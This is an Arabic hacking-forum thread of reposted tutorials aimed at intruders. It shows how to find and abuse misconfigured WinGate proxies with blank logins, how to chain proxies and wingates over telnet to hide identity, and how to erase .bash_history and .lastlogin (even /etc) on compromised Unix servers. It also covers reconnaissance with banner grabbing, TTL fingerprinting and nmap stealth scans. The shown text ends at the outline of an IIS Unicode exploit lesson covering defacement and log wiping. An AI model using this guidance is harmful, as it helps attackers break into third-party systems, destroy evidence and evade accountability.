إذا أي شخص قام بتنزيل WinGate خاص به عليه الحذر بشدة ومعرفة ماهو يفعل ويتأكد من أنه موفق بشكل آمن وهنالك أخرى متعددة أكثر WinGate أمانا مثل برامج SyGate
في معظم الحالات ملفات Logs (سجلات) الخاصة بالـWinGate Server تحذف عادة بعد 48 ساعة للأعمال وأيضا للـISP's (خاصة بالكبار)
أي لايوجد حاجة أو موارد لتدوين كل شيء يصادف خادم wingate

How do I find Wingates
=(كيف يمكنني الحصول على WinGate؟)=
أفضل طريقة للحصول على هذا الشيء هو كلمة بالفم . بإمكانك تاخذ عنوان wingate من أصدقائك إذا كان أحد عنده . الشيء الثاني أقترح عليك تستخدم برامج
WinGate Scanner
هنالك العديد منها بالنت ابحث فقط في google
http://www.google.com/
كل ماعليك فعله هو وضع مدى ip او hostname ومن ثم البدء بالبحث
مثلا اقترح عليك البحث في بلاد العالم الثالث أو الشرق الأوسط وأفريقيا وأخيرا شبكة home@ كلهم يتشابهون ولديهم صفات شائعة وهي:
توفر wingates والذي وفق بصورة رديئة وعادة هناك wingate مفتوح قليل على NetWork حقهم ...
خلال Unix أفضل طريقة هي: المحاولة والخطأ
Trial and Error
اتصل بالتلنت في wingate من المنفذ 23
واذا لقيت اترك فراغ الاسم والباسوورد واذا دخلت راح تحصل واحد أيضا بإمكانك تجربة اسمك وكلمة سرك او تستخدم ميزة Guest (الضيف) أو Anonymously

Introduction to Socks Host
=(الدخول أو الإدخال إلى Socks Host)=
Socks Host تقريبا مثل WinGate لكن الاختلاف وهو ان السوكس يتصل من خلال المنفذ 1080 وبإمكانك عمل الإعدادات عليها وهي تتوفر في المتصفح
explorer and netscape
وبإمكانك إضافة Socks Host
وهذه الطريقة تستخدم كثيرا في Mirc وتقوم بحمايتك وبإخفاء ip الخاص بك وتعمل كـFireWall


**********************
وهذه برامج مساعدة على بقائك مجهول الهوية
**********************
Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$
Stealther
-------------------------------------------
ابحثوا عن البرنامجين السابقين في الإنترنت
--------------------------------------------
لكن أعلم ياأخي الكريم أن وبكل مافعلت لن تصبح مجهولا 100%
انتهى،،،


" كيف تبقى مجهول الهوية في النت(الجزء الثاني)؟؟ "
<منقول من منتدى إعصار>
<الكاتب: المدمر>
ألحين الموضوع هذا سوف يكون فيه تطبيق عملي وليس كالسابق...

هذه الفقرات عن Chaining Proxies لبقاء حريتك وسريتك على الإنترنت وقت أطول أثناء اتصالك لكن لاتظن ان هذا الموضوع كافي فكلما قرأت عن هذا الجانب سوف تصبح الشخص المجهول
وأيضا سوف نتكلم عن Chaining wingates لتصبح مجهولا على Telnet

-------------------------------------------(
من المعروف أن أغلبكم يستخدم proxy لإخفاء ip الخاص به او Domain او قد يستخدم البروكسي لكي يجتاز المواقع المغلقة وأيضا لحماية هويته .
لكن عليك ان تتعلم كيف تستخدم Proxy ومن الأفضل ان تعرف ماذا هو Ip Address و Domain أولا ,,,
قبل أن تقرأ هذا الموضوع علي اولا ان اقوم بإرشادك كيف تحصل على Proxy مع تحديثها من هذه المواقع:
http://www.multiproxy.org/anon_list.htm
http://tools.rosinstrument.com/proxy/
أو هنالك طريقة أفضل لكم وأنصحكم إنكم تسجلون بـGroup وهو يقوم بإرسال بروكسيات جديدة جدا وبمنافذ مختلفة
الجروب:[email protected]
طريقة التسجيل
قم بالدخول إلى حسابك وأرسل للجروب بهذه الطريقة
في خانة الإرسال إلى اكتب
[email protected]
وأرسل رسالة فارغة إليهم بعد ذلك سوف تتلقى رد مباشرة قم بعمل Replay
الآن مبروك لقد سجلت بالجروب
-------------------------------------------(

=========================
أن لن أقوم بمساعدتك في كل عمل تقوم به تستطيع التأكد من أن
البروكسي يعمل بالذهاب إلى :
http://www.privacy.net/
أو
http://www.proxytester.com/

وقد تعرف هل عنوان Ip تغير أم لا !!! هذا بالنسبة للموقع الأول أما الموقع الثاني فهو خاص لكشف البروكسيات واعطائك مستوياتها ..
=========================

*************************************

&&&&&&&&&&&&&&
proxy server
&&&&&&&&&&&&&&

هو خادم Proxy يقوم بالاتصال بين WebSite,IRC Chat,etc)

هذه البروكسيات تقوم بإرسال طلبات لكي يستقل او يستعرض المستخدم موقعا على الإنترنت البروكسي يرسل طلبك على الإنترنت لكي يطلب هذا الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وهذا سوف يخزن في Proxy Server
كما قلنا في الموضوع السابق...
هذي توضح كيف تتصل عن طريق البروكسي بالموقع
[User]>>>>>[Proxy]>>>>>[Web Pages]

----------------
Proxy Chaining
----------------
معناها عدة بروكسيات وهذي طريقة فعالة جدا لكي تصبح مجهولا الهوية حيث يمكنك ان تتصل بأكثر من بروكسي لكي تعرض موقع واحد
مثال/
[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination]
يوضح هذا المثال ان المستخدم اولا عليه الاتصال بالبروكسي الاول فالثاني فالثالث والرابع وأخيرا الهدف مما يسبب بطأ في الاتصال
Destination = web page, Unix server, ftp server, etc
إذا Proxy chaining مطلب ضروري لكي يستخدمه أي هكر ليحفظ سريته اثناء الدخول إلى أي server مثل telnet, ftp, or http
Chaining هي مهمة كما أقول لن تصبح مجهولا 100% لكن حاول بقدر المستطاع على ان لا تمسك ويطادونك مثل السمكة لكن البروكسيات المتعددة صعب ان يكشفها احدا لكن مثلا حاولت تدخل على موقع بالـftp راح يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من
Adminstrator ملفات Logs لكي يعرف المصدر والمصدر ايضا راح يكون proxy ههههههههه يعني على هذا المنوال إلى ان يصل الى المستخدم لذلك عملية Chaining Proxy عملية مفيدة جدا ويصعب احدهم الامساك بك
لكن ملفات Logs تنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى الحد المسموح به من تحميل الملفات على البروكسي الخادم الي يحتوي على البروكسيات لذلك سوف تصبح ملفات Logs متجددة ...

----------------
HTTP Chaining
----------------
HTTP chaining هي نفس طريقة Proxy ويمكنك عملها من مستعرضك وفي خانة Address
مثال:
http://proxy.magusnet.com/-_-http://www.google.com

حركة جميلة وجديدة (-_-) لم ترونها مسبقا صحيح !!!
وأيضا يمكننا استخدام Chaining مثل:
http://proxy.server1.com/-_-http://p...estination.com

او يمكننا وضع عناوين بروكسيات بمنافذها

http://anon.free.anonymizer.com/http://www.google.com

مثال آخر

كإضافة علامة (/) بين المواقع

http://proxy1/http://proxy2:80/proxy.../www.yahoo.com
proxy = استبدله ببروكسي رقمي يكون أفضل لك .....

----------------
Browser Chaining
----------------
وهو استخدام البروكسي من متصفحك وانا سوف يكون حديثي فقط عن Internet Explorer لأنه الأكثر استخداما ----
ألحين مثلا عندنا بروكسي
213.234.124.23:80
العنوان:213.234.124.23
المنفذ:80
ألحين كيف نحطها بدال البروكسي الخاص بالـISP أي مزد خدمة الإنترنت
نروح عند
أدوات Tools
خيارات إنترنت Internet Options
بعدين اتصالات Connections
تختار الاتصال الي تدخل في الانترنت بعدين
إعدادات Settings
راح تجد
Address (العنوان)
Port (المنفذ)
ونضعه بداله
العنوان:213.234.124.23 المنفذ:80 وبعد كذا اضغط موافق و

والحين نبغى نستخدم الاستعراض المتعدد Chaining Proixes
بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل كذا/
Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


&&&&&&&&&&&&&&
Wingates
&&&&&&&&&&&&&&
Wingate هو proxy server الذي ينزل في جهازه او جهازها ليسمح بالفرد او بعدة أفراد ليأخذون مقاعدهم بالمنفذ خلال 23 ((منفذ Telnet العادي ))
بعض Wingates يسمحون لأي شخص متصل online لكي يتصلون به مباشرة او في وقت قصير لاتتعدى الايام لكن اعلم ان هذا ليس من القانون وهنالك خصائص للـAdmin تمنع من استخدام wingate على جهازه هذا على حسب المدير هل يفهم في هذا المجال أم لا !!!!
وهي عبارة عن ip أجهزة أو اسماء أجهزة تتصل من خلالها على المنفذ 23 بأداة Telnet أو يمكنك من عمل بحث ببرامج
WinScan
Wingate
-------------------------------
Chaining Wingates Using Telnet
-------------------------------

ألحين راح نستخدم عدة Wingate كالسابق والأدوات التي نحتاجها

هي فقط DoS وأداة Telnet لأظن أن الأجهزة سوف تخلو من أهم هذين الأداتين إلا نادرا .....

جميع wingate تتصل عن طريق المنفذ 23 لكن المنفذ ليس مهما لكني سوف أضيفها لكم لكي تتعلموا فقط كيف يتم الاتصال بالـ Telnet عن طريق المنافذ

وهذا عنوان جهاز امكننا إحضاره

هو 61.133.119.130 ومنفذه 23

ويتم الاتصال به عن طريق Telnet مثل:

C:\WINDOWS>telnet 61.133.119.130 23
لاحظ وجود المسافات فمسافة زائدة او ناقصة قد تعثر خطوتك

بعد كذا سوف تتصل بالوين جيت مثل هذا

Wingate> 203.207.173.166 23

بعدين تقدر تكرر العملية اكثر من مرة ولكن مع تغيير العنوان يعني كذا

Wingate> 213.17.99.45 23

وأيضا اتصل مرة أخرى

Wingate> 10.65.212.7 23

ألحين بعد ماتتصل بأكثر من wingate اتصل بالموقع

WinGate>arbornet.org

اذا الطريقة وبخطوة سريعة تبدو كذلك

C:\Windows> telnet 61.133.119.130 23

Wingate>203.207.173.166 23

Wingate>135.245.18.167 23

Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected
انتهى،،،

"بين حماية الخصوصية وإزالة الأثارمن ملفات الـLogs"
<منقول من منتديات الحزم الإسلامية>
<الكاتب: حزم الظامي>

فيما يتعلق بموضوع التخفي ومنع تعقب الاثر مع سيرفرات يونكس أو لينوكس . أولاً لابد أن تعلم أن من أهم خواص يونكس التي تمنحه القوة . تقوم على تعدد المستخدمين . Unix Multi-User Mode Operation . ثم لا بد أن تعلم أن ( Linux )هو الاصدار المجاني من نظام يونيكس ( Unix ) . يعني الأفضل فهم يونيكس فحتماً ستتعامل مع لينوكس بكل ارتياح كونك تتعامل مع Unix

أولاً أريد أقسم الموضوع لقسمين رئيسين :
ساتكلم عن كل واحد منهما بعجاله لان الموضوع ما تكفي ساعات معدودة لكتابة كل شيء عنه . بل والله اتوقع ان عمر ابن ادم يفنى وهو يبحث عن الامن على الانترنت وكل ما تقدم مستواه كل ما اصبح يعي تماماً كل ما حوله وما يجب ان يقوم به من اجل التخفي ومنع تعقب الاثر ....

القسم الأول : يخص ملفات النظام التي يسجل فيه اجراءاتك ... ( LOG File )
القسم الثاني : يتعلق باتصالك وحماية خصوصياتك ... وهذا يقف عن قدرات كل شخص فينا ....



في الواقع جميع الاجهزة في انترنت تجمع المعلومات عنك ، ابسطها مثل عنوان ال IP و اكثرها حساسية مثل اسمك و رقم الهاتف الخاص بك ربما و عنوانك البريدي ........ ملفاتك و جهاز كومبيوترك محمي بصورة جيدة للغاية لو ارتبط بانترنت بواسطة نظام التشغيل فقط و بدون استخدام برمجيات اضافية، ولكن حتى ولو حصل ذلك ففي غضون الاسابيع القليلة الاولى سيفقد الجهاز الكثير من اجزاء حمايته نتيجة للاستخدام الغير سليم لانترنت تتابع الشركات نظم التشغيل بشدة، الكل يتابع الثغرات في Microsoft Windows و Linux و Mac و غيرهما ، لذلك من الصعب الوصول الى تلك الاجهزة بصورة فورية و بدون تدخل رسمي ....

والحقيقة انا لازلت في بداية طريقي لهذا المجال واسال الله ان يسهل ويفتح علينا من فضله ..


القسم الأول : يخص ملفات النظام التي يسجل فيه اجراءاتك ...
ما يتعلق بملفات التسجيل لاجراءاتك تسمى ( LOG File ) . مؤرخه بالوقت والإجراء .
وتسمى سجل الاحداث كما تسمى ملفات سجل الأداء

تسجّل جميع مزوّدات الويب (Web servers) معلومات واسعة عن حركة الوصول إلى موقعك، ضمن ملفات سجل الأداء (log files)، وهي عبارة عن ملفات نصوص بسيطة تلتقط نشاطات الكمبيوتر المزوّد. ويمكن تحليل معلومات سجل الأداء يدوياً، وهذا ما كان يفعله الناس، في بدايات شبكة ويب. لكن إذا زاد حجم ملف سجل الأداء (log file) عن بضعة كيلو بايتات، فإن التحليل اليدوي يصبح غير عملي، إن لم يكن مستحيلاً كلياً. وإذا أخذت بعين الاعتبار أن مزوّدات اليوم تولّد ملفات لسجل الأداء، يصل حجمها إلى ميجابايتات كثيرة، بل ويصل في كثير من الأحيان إلى جيجابايت أو أكثر، لأدركت ببساطة أن التحليل اليدوي غير وارد إطلاقاً.
ملفات سجل الأداء
تبعاً لمزوّد الويب الذي تستخدمه، تحتوي ملفات سجل الأداء، على بعض-ومن المحتمل جميع-المعلومات التالية، لكل زيارة يقوم بها زائر إلى موقعك:
وأريد أخبرك ان ثمة ملفات لا يمكنك الووصول لها وهي تراقب كل اجراءاتك ... وتختلف الاجراءات الأمنية من نظام لاخر حسب قدرات مدير النظام الذي تعمل عليه ...


اقتباس:
________________________________________
عموما أخوي هيكس تكلم عن هذه الملفات في نظام WIN NT .
وكيف يتم إزالة اللوق فايل ويمكن الرجوع لدرسه ...
________________________________________

وانا الان راح اخبرك عن اهمها ولا يشترط ان تزيل كل شي :
( فما لا يدرك كله لا يترك جله ) ودائماً حتى لا تحبط ( إذا لم تستطع شيئاً فدعه وجاوزه إلى ما تستطيع )
عموما الطريقه المثلى للتعامل مع انظمة يونكس ... هي استخدام الشل النصي وهذا رأيي فأنا إلى الان اعيش في ذهول من قدرات هذا النظام العجوز ... يكفي ان الدوس صاحب الامكانيات والسهولة .. وسرعة التنفيذ والاستجابه هو في الأصل جزء أو أداة من أدوات يونيكس وعملت مايكروسوفت على تطويرها والا فالاصل هو يونكس بلا ادني شك ...
عموما أهم الملفات حالياً أريدك تحذفها كل ما تستخدم الشل النصي . هي كالتالي :
.lastlogin
بدايته بنقطه مما يعني انه ملف مخفي فاي ملف أو مجلد يبدا بنقطه اذا هو مخفي مباشرة في يوينيكس .
وهذا الملف يسجل به اخر ايبي سجل الدخول .

.bash_history
هنا راح تسجل جميع الأوامر التي نفذتها

.contactemail
اذا ما كنت تستخدم الشل النصي للتعامل مع البريد

أيضاً أريد منك حذف هذين المجلدين
Tmp والاخر .trash ويا حبذا تنسف معهم مجلد etc .

هنا مشكلة ربما يعرفها البعض .
هو كوني حذفت ملفي .lastlogin & .bash_history
باستخدام الامر rm تلقائياً راح يكون ناتج هذا الاجراء تجدد ملف الباش .bash_history
ليصبح محتواه :
rm .bash_history
rm .bash_history

وراح يكون ناتج ملف .lastlogin هو الايبي الذي دخلت به اخر مره .
طيب وش الحل ننسفها نهائياً وما نريد أوامر الحذف تظهر ....
الطريقة تستخدم cpanel هو أفضل إجراء . وللعلم يا أخون هناك اعدادت جباره في اليونكس تمكنك من الابداع ومن التجديد والابتكار ..

عموما أخواني للعلم حتى يمكنك اللعب بالنظام كامل بالايبي المحلي : localhost واذا مد الله في العمر تكلمنا عن هذا الموضوع باذن الله ...

لاحظ هذه الصورة : وهي من سي بانل مش فوتوشوب وبنفس الطريقة تتحكم في السيرفر بلا اي معلومات عن المصدر الحقيقي للاتصال ....


عموما سأعود لهذا الموضوع اذا مد الله بالعمر والله اني اعمل من اشهر على كتابة دروس نظرية وتطبيق عملي لاحتراف يونيكس ...
وراح نكمل الحديث عن ملفات اللوق وحذفها حتى وإن لم يكن مسموح لك بملكيات ... فوالله تستطيع الحذف ...

ننتقل للجزء الاخر ...
القسم الثاني : يتعلق باتصالك وحماية خصوصياتك ... وهذا يقف عن قدرات كل شخص فينا ....

أخوي الحقيقة المشكلة أن الأغلب منا يستخدم إما نفس البروكسي لمستضيف الخدمه اللي يستخدمه .. وان سهل الله .. اشتغل ببروكسي يعمل مع بروتوكولات التصفح (HTTP Protocol ) ويجب أن ندرك أنك حين تتعامل مع نظام يونيكس أو الانظمة الاخرى الشبيهه
والحقيقة ان كونك تستخدم البروكسيات المعتاده للتصفح فهذا لا يخفي هويتك اذا استخدمت بروتوكولات HTTP ولكن الحل الأمثل .... أنك تستخدم بروكسيات السوكس SOCKS Protocol . فيجب عليك إيجاد ارقام سوكس لاستخدامها حماية لخصوصيتك أو عند الحاجة للتخفي اناء عملك على النظام .
عموما البروكسيات في مجملها ثلاثة أنواع .
1) Web Proxy Service وهذا للتصفح . HTTP Protocol .
2) WinSock Proxy Service وهذا مفيد مع سيرفرات windows NT ويفيد في عملها على اخفاء هويتك عند العمل على بروتوكولات telnet أو FTP وهذا هو البروتوكول WinSock Protocol ......
3) Socks Proxy Service . وهذا الأقوى ويستفاد منه في (SSL) Secure Sockets Layers بالاضافة إلى (IIS) Internet Information Server ويخدم مع Windows NT وكذلك FTP ، Telnet، Gopher،IRC ، RealAudio ، POP3 وهذا النوع يجمع بين كونه firewall إضافة إلى خدمة أمنية . securiy ... وتكمن وظيفته في تغيير معلومات موارد خدمة الانترنت التي تتصل بها ..... وعادة ما يستخدم فيها بروتوكول TCP/IP ويستخدم هذا البروتوكول وسيلتين للاتصال :
* طريقة المنظمة العالمية (Internationa Organization for Standardization)
** مجموعة بروتوكولات للاتصالات . وضعتها وزارة الدفاع الأمريكية . ransmission Control Protocol TC ...
الحقيقة أخواني هناك أمر هام جداً وهو أن ثمة برامج تساعدك كثيراً بتقنياتها المحترفة تساعدك في التخفي من تقنيات الرقابة التي لا يخلوا منها نظام ... وهي كثر جداً :
Ping، Traceroute, DNS lookup, Finger, Whois, LDAP, SNMP وهذا يكون باعتبار النظام واعتبار بروتوكول الاتصال الذي يستخدمه نظام : WIN NT ... ويستفيد من وتوكول TCP/IP لمراقبة النظام ...
وبالمقابل يتم مراقبة نظام UNIX عن طريق الرواتر . Router وهو أداة فعاله لتشخيص النظام ونعني بهذا المصطلح أي الموجه أو الموزع ويتميز الراوتر بقدرته على التعرف على كل جزء من أجزاء الشبكة ويعمل عى مراقبة الأداء وموازنة سير البيانات ويسمح للشبكات المتصلة بالحفاظ على استقلاليتها ...ومواصفاتها وعناوينها الخاصة .
وهنا نوعين للموجهات أو الموزعات (Router ) . الأول : إستاتيكي يتطلب من مدير الشبكة ضبط يدوي .
ويتميز هذا النوع بالامان .
والثاني ديناميكي .... يقوم بأعماله اتوماتيكياً ...ويحتاج الى ضبط بسيط وهو أقل أماناً من الأول .

عموما انا اسف ربما تفرعت في هذا الموضوع . عموما إخواني بالنسبة للاتصال ... أنا أقول لكم عليكم بتشفير أو إخفاء أو تزوير بياناتكم باي طريقة ... ببرامج أو بدون . وعليكم بمراقبة هذه البورتات :

http://www.analogx.com/files/proxyi.exe

ويدعمه برنامج آخر اسمه : PortBlocker
يساهم في حماية البورتات التي تستخدمه في تصفحك أو نقلك للملفات أو غيرهما من ان تستخدم في مراقبة تحركاتك وتسجيل معلوماتك :
PortBlocker is configured to block the most common types of servers that might be on a system (FTP, HTTP, etc), so will not require any modification for most users. If you are running a special server of some sort, then you can easily add it's ports (either TCP or UDP) to it's list, and have them blocked and/or logged.
Log unauthorized port access attempts and secure internal servers from internet access easily...

حمل من هنا برنامج PortBlocker
http://www.analogx.com/files/pblocki.exe

والحقيقة أحمد الله الذي ذكرني بهذا البرنامج المميز وهو الذي يوضح لك كل المعلومات التي سجلت لمراقبتك أناء عملك على نظامك .
بالطبع كلكم تعلمون أن مايكروسوفت معروفة بطبعها التجسسي ...
فأقدم لكم هذا البرنامج لكي تعرفوا كل ما تم تسجيله عنكم ولا تنسوني من دعوة ... لاني متأكد ان الكم الهائل من المعلومات المرسلة والتقارير عنك وعن غيرك منتظمة وخفية ولكن آن لها أن تفضح ...
اسم البرنامج : Proxy Log Analyzer

للتحميل : 1.07 MB بدون ضغط
http://www.mechanicalminds.com/software/pla/setup.exe

ZIP archive instructions 818 kb
http://www.mechanicalminds.com/software/pla/pla.zip

ناهيك عن أن المتصفح يسمح لك بتعبئة البيانات كما تحب .
Provides a space for you to type the address and port number of the proxy server you want to use to gain access to the Internet over HTTP, Secure, FTP, Gopher, and Socks protocols.
فقط استخدام الاعدادت المتقدمة للاتصال :
حتى الايبي بالماسنجر بامكانك ترسل كل ملفاتك بلا حصول أي انسان على الايبي الحقيقي لك .
والطريقة سهله ... اذهب افتح الماسنجر من قائمة ادوات خذ خيارات .

انتهى،،،
"برنامج HTTP Port الذي يجعلك تتصفح النت متخفيا!!"
<منقول من منتدى نجم دوس>
<الكاتب:المدمر>
اسم البرنامج:
------------------------
HTTPort 3snf
------------------------

الوظيفة:
------------------------
برنامج لتصفح بسرية وأمان
في الأنترنت

ويريحك من البروكسيات الرقمية

ومن البحث عنها

,,,,,,,,,,,,
------------------------


وصلة التحميل
------------------------
http://www.angelfire.com/tv2/ssdd63/httport3snf.zip
------------------------


" كيفية القيام بجمع المعلومات عن موقع أو شبكة "
<منقول من منتدى إعصار>
<الكاتب: المدمر>
طرق جمع المعلومات لأي موقع أو سيرفر أو شبكة أيا كانت :

=(الطريقة الأولى)=
^^^^^^^^^^^^^^^^^^^
وهي من خلال زيارة موقع
http://www.netcraft.com/
وتكتب الموقع هناك وراح يعرض لك معلومات تفيدك كثير
^^^^^^^^^^^^^^^^^^^

=(الطريقة الثانية)=
^^^^^^^^^^^^^^^^^^^
وهي قديمة تستخدم حديثا لكني لاادري مدى عملها ولنفرض الموقع الي نبي نجيب معلومات عنه هو
http://www.almodammer.com/
نقوم بإرسال رسالة لإيميل وهمي وغير موجود مثل
dfl;kjgk'[email protected]
وبعد ارسال رسالة لإيميل وهمي راح تستقبل رد ولما تعرض الـHeaders الخاص بالرسالة راح تلاقي معلومات عن الموقع
^^^^^^^^^^^^^^^^^^^

=(الطريقة الثالثة)=
^^^^^^^^^^^^^^^^^^^
الـBanners
ماهو البانر؟
البانر وباختصار شديد هي الرسائل التي تأتيك عندما تنفذ أمر ما يعني الرد..
وكيف راح نستغلها في كشف معلومات الموقع؟
عن طريقة أداة Telnet Client عميل التلنت والطريقة هي أن تقوم بالاتصال بأحد المنافذ سواء كان
FTP 21
أو
TELNET 23
^^^^^^^^^^^^^^^^^^^

=(الطريقة الرابعة)=
^^^^^^^^^^^^^^^^^^^
وهي HTTP
Hyper Text Transfer Protocol
ويعمل على المنفذ 80 - 8080
ألحين نتصل على المنفذ 80 عن طريق Telnet وبعدين نكتب الأمر التالي
GET /qwe HTTP/1.1
بعد كذا راح يخبرنا البانر بوجود صفحات الخطأ 400
وراح تجيك معلومات هائلة عن الهدف
وفيه عندك امر ثاني وهو:
HEAD 127.0.0.1 HTTP/1.1
تقوم بتنفيذه ...
^^^^^^^^^^^^^^^^^^^

=(الطريقة الخامسة)=
^^^^^^^^^^^^^^^^^^^
وهي من أمر ping الذي يقوم بإرسال عدة طلبات للـip أو للموقع ويقوم باستقبال الردود وبسرعة هائلة
الحين كيف نستفيد منها في تحديد معلومات للموقع !
حيث تقوم بوضع التالي
ping ipsite
ipsite= الآي بي الخاص بالموقع
وراح يطلعلك عدة اسطر حنا مايهمنا الا كلمة
TTL=XXX
XXX=القيمة والعدد الي طلعلك
بتقولي وش فايدته أقولك من خلاله يمكن تحديد نظام التشغيل وهذي امثلة:
Windows 9x/NT Intel 32
Windows 9x/NT Intel 128
Windows 2000 Intel 128
DigitalUnix 4.0 Alpha 60
Unisys x Main***** 64
Linux 2.2.x Intel 64
FTX(UNIX) 3.3 STRATUS 64
SCO R5 Compaq 64
Netware 4.11 Intel 128
AIX 4.3.x IBM/RS6000 60
AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60
Cisco 12.0 2514 255
IRIX 6.x SGI 60
FreeBSD 3.x Intel 64
OpenBSD 2.x Intel 64
Solaris 8 Intel/Spar 64
Solaris 2.x Intel/Sparc 255
وقد يحدث اختلاف في القيم حيث يكون الفرق يساوي واحد
أي: عند مرور data list or packet (حزم او قائمة بيانات) بـNodes حيث أن TTL تنقص بـ1
لذلك عليك ان تستعمل أمر tracert في الويندوز أما traceroute فهو خاص باليونكس
وهو امر خاص بعرض معلومات عن الشخص أو الموقع
ويمكننا استخدامه بهذه الطريقة
tracert ip
ip= عنوان الموقع أو السخص
^^^^^^^^^^^^^^^^^^^

=(الطريقة السادسة)=
^^^^^^^^^^^^^^^^^^^
عن طريقة الأدوات والبرامج
أولا Windows لأنه الأسهل
يمكنك تحديد معلومات عن الموقع والسيرفر او المنافذ المفتوحة من قبل تطبيق اي برنامج ويمكنك استغلال المنافذ بكثير من عمليات الاختراق وسوف نطرق لها في الدرس الثاني
تعرفون ان الويندوز مليان برامج لكن تعرفون ان مو كل برنامج مثل أي برنامج عشان كذا راح اذكر الافضل :
N-Stealth (لتحديد معلومات عن الشبكة منها المنفذ ثغرات ...الخ)
=============
Shadow Sceurity Scanner )من أفضل برامج البحث عن المنافذ والتطبيقات والعمليات ومعظم الثغرات مع وجود شرح لكيفية علاجها)
=============
SuperScan )برنامجي المفضل فأنا استخدمه لاختراق المواقع والأجهزة حيث يساعدني كثيرا في معرفة المنافذ المفتوح بالموقع والأجهزة ويحتوي على List كبيرة يمنك الإضافة عليها كيفما شئت)
-------------------------------------------------------------------------
الحين نجي على Linux
هو برنامج واحد مفضل وأكثر مستخدمين ليونكس يشهدون بجدارته والذي يحمل اسم
Nmap
اختصار لـNetwork Maper (مستكشف الشبكات)
وطبعا يفوق كل ادوات ويندوز وطرق ويندوز علشان كذا دائما ينصح بـLinux وهو خاص للمتهمين باختراق الشبكات/المواقع/السيرفرات
كيفية استمعاله :
شغل nmap وراح تجد الكثير من الأوامر الذي ظهرت مثل/
[l] Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan http://www.microsoft.com/ and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
وأيضا يحتوي العديد من الاوامر المجهولة !!!!!!!!!
ولخلفية ومعلومات اكثر قم بالذهاب إلى man page الخاص بالبرنامج..
لنشرح أهم أمر وهو
nmap -sS -O -vv almodammer.com
almodammer.com=الموقع المراد فحصه
وراح يعرض لك معلومات هائلة تفوق معلومات برامج وأدوات ويندوز
منها المنافذ والإصدار والملقم والسيرفر .......
^^^^^^^^^^^^^^^^^^^

=)الطريقة السابعة)=
^^^^^^^^^^^^^^^^^^^
تعتمد على وجود جهازك Linux أو Shell Account حتى تقدر تطبق اوامر اليونكس في الويندوز لكن لو تركب Linux أفضل لأن Shell لازم يكون ممتاز وسعره مناسب علشان كذا لاتتعب نفسك وركب Linux وارتاح
المهم هذا أمر whois
والي يوفره لنا Linux والويندوز كبرامج كبيرة وثقيلة وغير دقيقة
ولمعلومات أكثر اضف الأمر
man whois
-------------------------------------------------------------------
أما عن طريق الويندوز فيمكنك البحث في google
http://www.google.com/search?q=whois&btnG=Google+Search
والكثير من المواقع تقدم هذي الخدمة وهي سكربتات و cgi تقوم بالبحث عن الموقع بإحدى الطرق التي ذكرتها مع اختلاف بسيط وهي شبيهة بموقع netcraft الطريقة الأولى..............
انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 02:21   #12
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
" الإختراق عن طريق اليونيكود (الجزء الأول) "
<منقول>
<الكاتب: sNiper_hEx>
يحتوى الدرس الاول على ( 13 نقطة ) وهي كما يلي :-
- تعريف باليونيكود .
- تاريخ ظهور هذه الثغرة .
- كيفية ايجاد هذه الثغرات .
- كيف يتم استغلال ثغرات اليونكود .
- الاوامر المستخدمة بواسطة ملف CMD .
- طريقة تطبيق هذه الثغرات .
- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
- طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
- كيفية عمل اكاونت للدخول بواسطة الـFTP .
- طريقة كشف باسورد الادمينستريتور .
- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
- مسح ملفات اللوق حتى لا يتم التعرف عليك .



- تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .


- تاريخ ظهور هذه الثغرة .
